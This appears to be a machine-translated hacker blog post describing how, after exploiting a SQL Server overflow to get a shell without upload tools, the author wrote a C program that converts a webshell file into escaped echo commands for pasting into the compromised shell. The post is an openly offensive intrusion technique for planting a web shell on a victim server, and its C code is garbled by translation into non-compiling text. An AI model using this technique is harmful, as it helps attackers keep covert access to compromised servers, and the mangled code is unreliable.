When I was overflow with SQLHELLO, I got a shell and tried Trial AT. It can be executed, it seems to be admin privileges, but it can't use NET, FTP, TFTP command. Halo, how do you upload a document?
Oh, okay, it is hard to me. Just on the hell on the command line Echo a WebShell and then do it.
Although only Echo a few lines of applets, it is exhausted, so I use C to write a program to prepare it.
The principle is very simple, that is, before each line of code, "echo", then add ">> echofile.txt", pay attention to the special symbol (<,>, &, |, ", ^) before adding ^.
The code is as follows: #include "stdio.h" #include #include void echo (char so [30], char sa [30]) {file * fp1, * fp2; char CH; IF ((FP1 = FOPEN)) == null) {Printf ("Don't open file% S / N", SO); exit (0);} if ((fp2 = fopen) Echofile.txt "," W ")) == NULL) {Printf (" DON't Creat File / N "); Exit (0);} FPUTS (" Echo ", FP2); CH = FGETC (FP1); While (! feof (fp1)) {if (ch == '^' || CH == '<' || CH == '|| CH ==' & '|| CH ==' | '| | ch == '") {fputc (' ^ ', fp2); FPUTC (CH, FP2);} else if (ch ==' / n ') {fputs (" >> ", fp2); FPUTS ( SA, FP2); FPUTS ("/ n", fp2); FPUTS ("echo", fp2);} else {FPUTC (CH, FP2);} CH = FGETC (FP1);} fclose (fp1); fclose FP2); Printf ("DONE! / N");} int main (int Argc, char * argv []) {if (argc! = 3) {printf ("/ n ---------- -------------------------------------------------- ------- / n "); Printf (" | echo file, by Lake2 (http://mrhupo.126.com) 2004/109 | / n "); Printf (" --- -------------------------------------------------- ------------- / N "); Printf (" - i will write a file to echo-file lake2.txt:) / n "); Printf (" -USAGE: / N "); Printf ("% s / n ", argv [0]); Printf (" - example: / n% s cmd.aspx cmd.txt / n ", Argv [0]); RETURN 0;} echo (argv [1], argv [2]); Return 0;} The parameter is two, which is the shell file name and the file name to generate, the program will generate the echofile.txt file, The inside contains all the commands to enter to echo (huh, sometimes there will be more echo, but there is no relationship ^ _ ^).
Can you copy a line now? Oh, of course. Copy all the content stick to the shell. There is a carrier under the command line which will automatically perform the previous command. Oh, hurry to see, the webhell is generated ^ _ ^ Ask another question, in this case, there is no other way to upload a document?
